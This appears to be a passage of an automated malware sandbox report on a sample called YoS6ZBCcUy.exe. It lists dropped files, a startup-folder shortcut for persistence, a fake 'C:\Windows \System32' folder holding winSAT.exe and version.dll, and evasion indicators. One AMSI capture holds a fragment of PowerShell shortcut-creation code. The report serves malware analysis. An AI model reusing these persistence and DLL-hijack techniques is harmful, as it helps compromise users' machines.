Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExecutable created and started: C:\Windows \System32\winSAT.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\ffmpeg.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\winSAT.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\NSIS.exe
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Roaming\MyElectronApp\version.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\ffmpeg.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\8e6f904c-93b6-4e7c-b442-119a15f71127.tmp.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\version.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\LICENSE.electron.txt

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78100B90019_2_00007FF78100B900
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF78100B75C19_2_00007FF78100B75C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF78100B90022_2_00007FF78100B900
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF78100B75C22_2_00007FF78100B75C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78100B90031_2_00007FF78100B900
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF78100B75C31_2_00007FF78100B75C
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD4D04 Sleep,ExitProcess,19_2_00007FF780FD4D04
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF780FD4D04 Sleep,ExitProcess,22_2_00007FF780FD4D04
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF780FD4D04 Sleep,ExitProcess,31_2_00007FF780FD4D04
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE5108 rdtsc 19_2_00007FF780FE5108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4933Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 991Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1604
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3642
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 868
